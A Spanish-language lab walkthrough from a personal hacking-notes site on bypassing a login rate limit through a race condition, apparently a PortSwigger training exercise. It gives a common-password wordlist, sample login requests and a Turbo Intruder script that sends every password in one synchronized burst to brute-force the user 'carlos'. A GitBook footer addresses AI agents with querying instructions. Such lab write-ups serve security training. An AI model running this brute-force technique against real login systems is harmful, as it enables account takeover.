> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/race-conditions/rate-limit-bypass-via-race-condition.md).

# Evasión del límite de velocidad mediante condición de carrera

### Omisión de límites de tasa mediante condiciones de carrera

El mecanismo de autenticación establece un **límite en el número de intentos** para evitar ataques de fuerza bruta. / Sin embargo, \*\*se observa\*\* que esta protección puede eludirse debido a una **condición de carrera** al procesar solicitudes simultáneas.

Objetivo del laboratorio:

* Usa la condición de carrera para omitir la limitación.
* Encontrar la contraseña del usuario **carlos**.
* Conéctate a la aplicación.
* Accede al panel de administración.
* Eliminar usuario **carlos**.

#### Lista de palabras utilizada

```bash
123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
contraseña
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000
```

#### Observación del mecanismo de conexión

Al enviar el formulario de inicio de sesión, \*\*se observa\*\* que se transmite una solicitud POST con los siguientes parámetros:

* `CSRF`
* `username`
* `contraseña`

```bash
csrf=8SbZ2jaR8pdJ0Q4r0XNqmTeVk5GJHxsx&username=wiener&password=peter
```

<figure><img src="/files/9ce1056ef09f4eccb2a7899770344d40de9f20c4" alt=""><figcaption></figcaption></figure>

Después de varios intentos incorrectos consecutivos, **aparece el mensaje**:

> *Has realizado demasiados intentos de inicio de sesión incorrectos. Por favor, inténtalo de nuevo en XX segundos.*

Esto confirma la presencia de una **limitación de tasa en el lado del servidor**.

<figure><img src="/files/3d785db2db8028f3ddad35a002f116f030124f86" alt=""><figcaption></figcaption></figure>

#### Contorneo por condición de carrera (pruebas manuales)

\*Establecimiento de un grupo "race condition".

<figure><img src="/files/36e75f3c52e641d676375227ea78d2449def8310" alt=""><figcaption></figcaption></figure>

* Duplica la pestaña **10 veces**.

<figure><img src="/files/1c0a103065e60e4a294d107fa1794da63d884bf7" alt=""><figcaption></figcaption></figure>

* Envía todas las solicitudes **en paralelo**.

<figure><img src="/files/fbd9f4e42e0c1e62b5f326d80e7e5cb8fcfb790a" alt=""><figcaption></figcaption></figure>

Prueba :

```bash
csrf=ab5gEWlWPKDUCJCQAlxrxR42dLIhJCWR&username=wiener&password=test
```

Observación: Al enviar en paralelo, **el bloqueo no ocurre** en este caso.

<figure><img src="/files/a4ae6982565a02a3356b09845b3c27fe68efb34a" alt=""><figcaption></figcaption></figure>

#### Fuerza bruta en paralelo sobre Carlos con Turbo Intruder

* Instala y usa el **Turbo Intruder** extensión.

<figure><img src="/files/d412de797757ad634253207798ddc6b7bc8e4dd6" alt=""><figcaption></figcaption></figure>

* A partir de la solicitud de inicio de sesión: **Enviar a Turbo Intruder**.

<figure><img src="/files/1e6f716adb98374821e707e055ff27ade2b0a6a7" alt=""><figcaption></figcaption></figure>

* Selecciona el **`race single packet attack.py`** script.

<figure><img src="/files/0d6eccc204c1980ea544108b6951f01cfa6c4840" alt=""><figcaption></figcaption></figure>

* Copia la lista de palabras al **portapapeles**, luego ejecútalo con este script:

```python
def queueRequests(target, wordlists):

    # si el objetivo admite HTTP/2, usa engine=Engine.BURP2 para activar el ataque de paquete único
    # si solo admite HTTP/1, usa Engine.THREADED o Engine.BURP en su lugar
    # para más información, consulta https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )


    passwords = wordlists.clipboard
    # el argumento 'gate' retiene parte de cada solicitud hasta que se invoca openGate
    # si ves una marca de tiempo negativa, el servidor respondió antes de que la solicitud se completara
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

    # una vez que todas las solicitudes etiquetadas con 'race1' hayan sido encoladas
    # invoca engine.openGate() para enviarlas sincronizadas
    engine.openGate('race1')


def handleResponse(req, interesting):
    table.add(req)

```

#### Resultado observado

Al probar todos los valores en paralelo, una contraseña devuelve un \*\*código HTTP 302\*\* (indicador de inicio de sesión correcto).

<figure><img src="/files/04fd3307bcc2f945aa0d6ffdfb788b3eaa312b5e" alt=""><figcaption></figcaption></figure>

\*\*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/race-conditions/rate-limit-bypass-via-race-condition.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
